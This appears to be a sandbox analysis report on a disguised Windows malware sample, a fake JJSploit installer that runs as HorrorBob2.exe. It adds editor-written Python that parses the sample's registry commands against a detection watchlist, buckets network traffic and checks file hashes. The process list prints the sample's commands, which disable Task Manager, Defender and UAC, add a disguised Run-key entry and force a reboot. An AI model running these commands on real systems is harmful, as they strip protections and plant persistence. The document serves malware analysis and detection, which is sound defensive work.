PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3140 wrote to memory of 3680 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/824221029240274995/1296988829957357669/JJSploit_8.10.7_x64-setup.exe?ex=6714f339&is=6713a1b9&hm=72f841359f4ee2c0dea65d59ca550ad724169a9e1fb75ee81982119970e22369&

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaa1dccc40,0x7ffaa1dccc4c,0x7ffaa1dccc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1804,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1792 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2068,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2080 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2156,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2372 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3076,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3104 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3084,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3136 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4540,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4548 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaa1dccc40,0x7ffaa1dccc4c,0x7ffaa1dccc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1864,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1860 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2076,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2112 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2204,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2220 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3080,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3228 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3084,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3276 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4408,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4364 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4576,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4572 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4568,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4684 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4428,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4860 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4548,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4248 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5008,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4676 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4284,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3112 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5220,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5244 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5232,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5376 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3316,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5104 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Downloads\HorrorBob2.exe

"C:\Users\Admin\Downloads\HorrorBob2.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AD23.tmp\HorrorBob2.bat" "

C:\Windows\SysWOW64\cscript.exe

cscript prompt.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f

C:\Windows\SysWOW64\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"

C:\Windows\SysWOW64\net.exe

net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"

C:\Windows\SysWOW64\shutdown.exe

shutdown /r /t 00

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa3a33855 /state1:0x41c64e6d
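
Everything the dropped batch file does after the Chrome noise is visible in the reg.exe lines above: it disables Task Manager, sets and locks a wallpaper, turns off Defender through the policy key, sets EnableLUA to 0 (which only takes effect after a reboot, hence the shutdown /r that follows) and registers C:\Service64\Service64.exe under a Run value with a vendor-looking name. The following is an added example, the editor's own code and not part of the report or the sandbox, that parses those command lines into hive, key, value name, type and data and matches them against a small watchlist. The RULES table, its labels (which reuse the report's signature wording where one exists) and all function names are the editor's; the sample command lines are copied from the process list above.

```python
"""Parse `reg add` command lines from a sandbox process list and flag the
policy keys this sample touches. Added example: the RULES watchlist and the
function names are the editor's own; SAMPLE_CMDLINES is copied from the
report's process list."""
import re

# Tokenizer: whitespace-separated, double-quoted strings kept as one token.
TOKEN = re.compile(r'"([^"]*)"|(\S+)')

# Normalise the long and short hive spellings reg.exe accepts.
HIVES = {
    "HKCU": "HKCU", "HKEY_CURRENT_USER": "HKCU",
    "HKLM": "HKLM", "HKEY_LOCAL_MACHINE": "HKLM",
    "HKU": "HKU", "HKEY_USERS": "HKU",
    "HKCR": "HKCR", "HKEY_CLASSES_ROOT": "HKCR",
}

# (hive or None = any, subkey, value name or None = any, data or None = any, label)
RULES = [
    ("HKCU", r"software\microsoft\windows\currentversion\policies\system",
     "disabletaskmgr", "1", "Disables Task Manager via registry modification"),
    ("HKCU", r"control panel\desktop", "wallpaper", None,
     "Sets desktop wallpaper using registry"),
    ("HKCU", r"software\microsoft\windows\currentversion\policies\activedesktop",
     "nochangingwallpaper", "1", "Locks the wallpaper (NoChangingWallPaper)"),
    ("HKLM", r"software\policies\microsoft\windows defender",
     "disableantispyware", "1", "Disables Windows Defender via policy"),
    ("HKLM", r"software\microsoft\windows\currentversion\policies\system",
     "enablelua", "0", "Disables UAC (EnableLUA=0, effective after reboot)"),
    (None, r"software\microsoft\windows\currentversion\run", None, None,
     "Adds Run key to start application"),
]


def tokenize(cmdline):
    """Split a Windows command line, honouring double quotes."""
    return [quoted or bare for quoted, bare in TOKEN.findall(cmdline)]


def parse_reg_add(cmdline):
    """Return {hive, key, value, type, data, force} for a `reg add` line, else None."""
    t = tokenize(cmdline)
    if len(t) < 3:
        return None
    exe = t[0].rsplit("\\", 1)[-1].lower()
    if exe not in ("reg", "reg.exe") or t[1].lower() != "add":
        return None
    hive, _, subkey = t[2].partition("\\")
    rec = {"hive": HIVES.get(hive.upper(), hive.upper()), "key": subkey,
           "value": None, "type": None, "data": None, "force": False}
    flags = {"/v": "value", "/t": "type", "/d": "data"}
    i = 3
    while i < len(t):
        flag = t[i].lower()          # reg.exe accepts /V, /F, /D in any case
        if flag == "/f":
            rec["force"] = True
            i += 1
        elif flag in flags and i + 1 < len(t):
            rec[flags[flag]] = t[i + 1]
            i += 2
        else:                         # /ve, /s, /reg:32|64 and anything unexpected: skip
            i += 1
    return rec


def normalised_data(rec):
    """DWORDs may be written as 1, 0x1 or 00000001; compare them as integers."""
    data, kind = rec.get("data"), (rec.get("type") or "").upper()
    if data is None or kind != "REG_DWORD":
        return data
    for base in (0, 10):              # base 0 handles 0x..; base 10 handles zero-padded
        try:
            return str(int(data, base))
        except ValueError:
            continue
    return data


def match_rules(rec):
    """Return the labels of every RULES entry this record satisfies."""
    data = normalised_data(rec)
    hits = []
    for hive, key, value, want, label in RULES:
        if hive and rec["hive"] != hive:
            continue
        if rec["key"].lower() != key:
            continue
        if value and (rec["value"] or "").lower() != value:
            continue
        if want is not None and data != want:
            continue
        hits.append(label)
    return hits


def triage(cmdlines):
    """Return (label, full key, value name, data) for each flagged command line."""
    findings = []
    for line in cmdlines:
        rec = parse_reg_add(line)
        if rec is None:               # net.exe, shutdown.exe, ...: not a reg add
            continue
        for label in match_rules(rec):
            findings.append((label, rec["hive"] + "\\" + rec["key"], rec["value"], rec["data"]))
    return findings


# Copied from the report's process list; the last two lines show non-reg commands being ignored.
SAMPLE_CMDLINES = [
    r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f',
    r'reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f',
    r'reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f',
    r'Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f',
    r'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f',
    r'REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"',
    r'net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"',
    r'shutdown /r /t 00',
]

if __name__ == "__main__":
    for label, key, value, data in triage(SAMPLE_CMDLINES):
        print(f"{label}: {key} [{value}] = {data}")
```

The matching is deliberately on the lower-cased subkey and value name rather than on the raw command line, because the same sample mixes `reg`, `reg.exe`, `Reg` and `REG`, short and long hive names, and upper- and lower-case switches; a substring match on any one spelling would miss the others.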

Network

Country Destination Domain Proto
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com udp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 1.80.190.35.in-addr.arpa udp
US 35.190.80.1:443 a.nel.cloudflare.com udp
N/A 224.0.0.251:5353 udp
GB 142.250.200.36:443 www.google.com udp
GB 142.250.200.36:443 www.google.com tcp
GB 142.250.178.10:443 content-autofill.googleapis.com udp
GB 142.250.179.238:443 apis.google.com udp
GB 142.250.178.10:443 content-autofill.googleapis.com tcp
GB 216.58.201.110:443 consent.google.com udp
GB 216.58.201.110:443 consent.google.com tcp
GB 172.217.169.78:443 clients2.google.com udp
GB 172.217.169.78:443 clients2.google.com tcp
US 216.239.34.157:443 tunnel.googlezip.net tcp
US 216.239.34.157:443 tunnel.googlezip.net tcp
GB 216.58.201.110:443 consent.google.com tcp
GB 142.250.178.10:443 content-autofill.googleapis.com tcp
GB 142.250.178.10:443 content-autofill.googleapis.com udp
GB 216.58.201.110:443 consent.google.com udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
GB 216.58.204.74:443 content-autofill.googleapis.com tcp
US 140.82.114.21:443 collector.github.com tcp
GB 216.58.204.74:443 content-autofill.googleapis.com udp
US 185.199.110.154:443 github.githubassets.com tcp
GB 20.26.156.210:443 api.github.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
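
Most rows in that table are Chrome's own traffic on the analysis VM (crash reports to clients2.google.com, autofill, consent, the data-saver tunnel, NEL reports to Cloudflare), the forward and reverse DNS lookups against 8.8.8.8, and one mDNS multicast row that has no domain column at all. Only cdn.discordapp.com, the URL the browser was pointed at, raw.githubusercontent.com, both of which the report flags as legitimate hosting services abused for hosting/C2, and the remaining GitHub hosts deserve a second look. The following is an added example, the editor's own code rather than anything from the report or the sandbox, that parses the flattened table, tolerates the three-column mDNS row, collapses duplicate rows and sorts each destination into a bucket; the suffix lists and function names are the editor's, and the rows are copied from the table above.

```python
"""Bucket the rows of a sandbox network table so that browser noise is not
promoted to indicators. Added example: BROWSER_NOISE, ABUSED_HOSTING and the
function names are the editor's own; NETWORK_TABLE is copied from the report."""
import ipaddress
from collections import Counter

# Rows copied from the Network table above. The mDNS row has only three columns.
NETWORK_TABLE = """\
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com udp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
GB 142.250.200.36:443 www.google.com tcp
GB 142.250.178.10:443 content-autofill.googleapis.com tcp
GB 172.217.169.78:443 clients2.google.com tcp
US 216.239.34.157:443 tunnel.googlezip.net tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 140.82.114.21:443 collector.github.com tcp
GB 20.26.156.210:443 api.github.com tcp
"""

# Hosts Chrome contacts on its own on the analysis VM (crash reports, autofill,
# consent, data-saver tunnel, NEL reports). Editor's list, derived from the table.
BROWSER_NOISE = (".google.com", ".googleapis.com", ".googlezip.net", "a.nel.cloudflare.com")

# Legitimate hosting services the report's signatures flag as abused.
ABUSED_HOSTING = {"cdn.discordapp.com", "raw.githubusercontent.com"}


def parse_row(line):
    """Parse 'country ip:port [domain] proto'; domain is None when the column is absent."""
    parts = line.split()
    if len(parts) == 4:
        country, dest, domain, proto = parts
    elif len(parts) == 3:
        (country, dest, proto), domain = parts, None
    else:
        raise ValueError(f"unexpected row: {line!r}")
    ip, _, port = dest.rpartition(":")
    return {"country": country, "ip": ipaddress.ip_address(ip),
            "port": int(port), "domain": domain, "proto": proto}


def bucket(row):
    """Assign a row to local / dns / abused-hosting / browser-noise / review."""
    ip, domain = row["ip"], row["domain"] or ""
    if ip.is_multicast or ip.is_private or ip.is_link_local or ip.is_loopback:
        return "local"
    if row["port"] == 53 or domain.endswith(".in-addr.arpa"):
        return "dns"
    if domain in ABUSED_HOSTING:
        return "abused-hosting"
    if domain.endswith(BROWSER_NOISE):
        return "browser-noise"
    return "review"


def summarize(table):
    """Collapse duplicate rows; return ({bucket: set of keys}, Counter of keys)."""
    buckets, seen = {}, Counter()
    for line in table.strip().splitlines():
        row = parse_row(line)
        key = (row["domain"], str(row["ip"]), row["port"], row["proto"])
        seen[key] += 1
        buckets.setdefault(bucket(row), set()).add(key)
    return buckets, seen


def indicators(table):
    """Sorted 'host:port' strings from the abused-hosting and review buckets only."""
    buckets, _ = summarize(table)
    keep = buckets.get("abused-hosting", set()) | buckets.get("review", set())
    return sorted({f"{domain or ip}:{port}" for domain, ip, port, _ in keep})


if __name__ == "__main__":
    buckets, seen = summarize(NETWORK_TABLE)
    for name, keys in sorted(buckets.items()):
        print(name, sorted(str(k) for k in keys))
    print("indicators:", indicators(NETWORK_TABLE))
```

The "review" bucket is intentionally not called malicious: the GitHub hosts here are just as likely to be the browser session that preceded the download as anything the dropped executable did, and the table alone cannot tell the two apart; the process tree, not the connection list, settles that.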

Files

\??\pipe\crashpad_3140_OENMXFHLMWOEDRLI

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
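
The two records just above are worth a closer look before anything from this list is promoted to an indicator: the crashpad pipe's four digests are the digests of zero bytes (d41d8cd9..., da39a3ee..., e3b0c442..., cf83e135...), and the digests of "SCT Auditing Pending Reports" are those of the two-byte string `[]`. Hash sets like these turn up in almost every detonation in which Chrome is involved and match nothing malicious. The following is an added example, the editor's own code and not part of the report, that checks a record's digests against a table of such trivial contents, flags records whose digests disagree with each other (usually a copy-paste error), and tolerates a truncated record like the last one in this list; the KNOWN_TRIVIAL table, the function names and the one constructed "mismatch" record are the editor's, the other records are copied from the Files list.

```python
"""Separate content-free file records from real dropped files in a sandbox
file list. Added example: KNOWN_TRIVIAL and the function names are the
editor's own; the records are copied from the report except MISMATCHED,
which is constructed."""
import hashlib

ALGOS = ("md5", "sha1", "sha256", "sha512")

# Contents whose digests turn up constantly in sandbox file lists and carry no
# indicator value: an empty file or pipe, an empty JSON array/object, a bare newline.
KNOWN_TRIVIAL = {b"": "empty file", b"[]": "empty JSON array",
                 b"{}": "empty JSON object", b"\n": "single newline"}


def digests(data):
    """All four digests of the same bytes, keyed by algorithm name."""
    return {a: hashlib.new(a, data).hexdigest() for a in ALGOS}


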